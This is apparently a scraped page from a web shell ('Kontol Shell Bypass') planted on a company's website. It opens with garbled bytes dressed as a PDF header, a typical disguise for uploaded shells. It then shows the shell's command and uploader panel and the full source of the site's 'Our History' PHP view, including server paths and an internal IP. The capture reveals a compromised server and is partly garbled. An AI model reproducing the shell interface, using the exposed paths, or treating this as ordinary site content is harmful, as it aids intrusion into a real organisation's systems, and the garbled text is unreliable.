%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /var/www/html/shardacorporation.net/application/views/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : /var/www/html/shardacorporation.net/application/views/history.php
<?php 
$banner_image  = $bannerArray['banner_image'] <>'' ? base_url('attachments/banner_images/'.$bannerArray['banner_image']) : base_url('assets/imgs/history-bg.png');
$banner_text = $bannerArray['banner_text'] <> '' ? $bannerArray['banner_text'] : 'Our History';
?>
<section class="innerpage-slider">
	<div class="innerpage-sliderin">
    	 <img src="<?= $banner_image ?>" width="1440" height="524"  alt="Sharda Corporation" />
         <div class="innerpage-content">
         <div class="container">
         <div class="row">
         <div class="col-md-9">
                	 <div class="heading">
                     	<div class="leaf wow bounceInLeft" data-wow-offset="300"> <img src="<?= base_url('assets/imgs/leaf5.png') ?>" width="340" height="414"  alt="Sharda Corporation" /></div>
                        <h1><?= $banner_text ?></h1>
                    
                     </div>
                </div>
         </div>       
         </div>
         </div>
   	</div>          
</section>

<section class="business-detail sustainable">
	<div class="container-fluid">
    <div class="row">
    	<div class="col-md-1"> </div>
    	<div class="col-md-4">
    		 
            	 
		 </div>
         
         <div class="col-md-7">
         	<div class="sharda-heading">
           <h2> 
           <?= $historydetails['title'] ?>
           <!-- <strong>Our </strong>History -->
           </h2>

			
            </div>
            
         </div>
   		</div>
	<div class="row">
    	<div class="col-md-1"> </div>
    	<div class="col-md-4">
    		<div class="business-1">
            <?= html_entity_decode($historydetails['description']); ?>
            	<!-- <h4>Overview</h4>
            	<p>Sharda group was established in 1996 with a vision to envisions an ambiance of excellence, inspiring value-based- education, research, and development by creating a workforce of corporate professionals with analytical skills.
</p>			 -->
                 <a href="#business-striky" class="button2"><span>Discover More </span><i class="fa fa-arrow-down" aria-hidden="true"></i></a>
            
            </div>
            	 
		 </div>
         
         <div class="col-md-7">
         <div class="video-sec">
         <div class="leaf-2 wow bounceInRight" data-wow-offset="300"><img src="<?= base_url('assets/imgs/leaf5.png') ?>" width="320" height="390" alt="Sharda Corporation" /></div>
         <?php if(!empty($historydetails['youtube_url'])){
              $video_id = explode("?v=",$historydetails['youtube_url']);
              $video_id = $video_id[1];
              ?>
            <iframe width="100%" height="450" src="https://www.youtube.com/embed/<?=$video_id?>" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen=""></iframe>
         <?php } else if(!empty($historydetails['aboutus_image'])){?>
         <div class="div-frame">
         	<img src="<?= base_url('attachments/aboutus_images/'.$historydetails['aboutus_image']); ?>" width="801" height="428" alt="Sharda Corporation" />
            </div>
         <?php }?>
            </div>
         </div>
   		</div>
	</div>
	</section>	
<section class="sec-uilist" id="business-striky">
<div class="container">
    	 <div class="row">
         <div class="col-md-12">
<div class="ul-list">
            	<ul>
                	<li><a class="tablinks active" href="#our_aim" onclick="openCity(event, 'our_aim')">Our Aim</a></li>
                    <li><a class="tablinks" href="#our_dream_vision" onclick="openCity(event, 'our_dream_vision')">Our Dream &amp; Vision</a></li>
                    <li><a class="tablinks" href="#our_initiatives" onclick="openCity(event, 'our_initiatives')">Our Initiatives</a></li>
                    
                	 
                </ul>
            </div>
            </div>
            </div>
            </div>
</section>
 	<section class="business-detail sustainable1 sustainable-new">
 	
    <div class="container">
    	 <div class="row">
         <div class="col-md-12">
         	
            <?php foreach($historyArray as $history){?>
             <div class="sustainable-in" id="<?=$history['category']?>">
              <div class="blank"></div>
                  <div class="images">
            		
                    <img src="<?=base_url('attachments/history_images/'.$history['history_image'])?>" width="533" height="auto" alt="<?=$history['title']?>"  />
                </div>
                <div class="content">
                <h4><?=$history['title']?></h4>
                <?=html_entity_decode($history['description'])?>
                     
                <!--	<p>The group aims to create a dynamic and collaborative climate to broaden the students' competence and provide a healthy learning environment that is resilient, flexible, and productive, having high ethical standards and responsiveness to the social environment. 
</p>
                    <p>Since India is emerging as a preferred destination for leading MNC investments in IT, Software, R&D, Automobile, Manufacturing, Healthcare, Pharma & several offshore and outsourced operations, "Knowledge-based" and "Process Driven" Organizations are need of the hour, and the demand for knowledge workers, team leaders and managers is increasing at a remarkable rate. </p> -->
                </div>
            </div>
            <?php }?>
             <!-- <div class="sustainable-in" id="OurDreamVision">
             <div class="blank"></div>
                <div class="images">
            		
                    <img src="http://13.126.253.70/shardagroup/assets/imgs/abt6.png"  />
                </div>
                <div class="content">
                    <h4>The Dream &amp; Vision</h4>
                	<p>It was a dream and vision of late Shri Anand Swaroop Gupta, the father of our dynamic Chairman Shri P.K. Gupta and Vice-Chairman Shri Y.K Gupta (SGI), to bring quality education at the door-step. This brainchild idea has been brought to reality by forming Sharda Educational Trust.
</p>
                </div>
            </div>
             
             <div class="sustainable-in" id="OurInitiatives">
             <div class="blank"></div>
                <div class="images">
            		
                    <img src="http://13.126.253.70/shardagroup/assets/imgs/abt7.png"  />
                </div>
                <div class="content">
                    <h4>Our Goal</h4>
                	<p>Sharda Educational Trust was therefore formed in the year 1995 as an educational initiative, acknowledging the upcoming trends by a group of leaders from industry, business, and academia with an affirmative purpose of providing "Professional Education that meets Global Challenges." The Trust began with its first venture in the year 1996 by founding "Hindustan College of Science and Technology," located on the National Highway #2 between Agra and Mathura city in India with a Student Strength of 60 and currently has expanded to run 20 institutions from 4 sprawling campuses of 200 acres with a strength of 13,000 plus students on campus and Trust of 47,500 alumni collectively.
</p>
                </div>
            </div> -->
        </div>
          
         </div>
        
    </div> 
    
</section>

Kontol Shell Bypass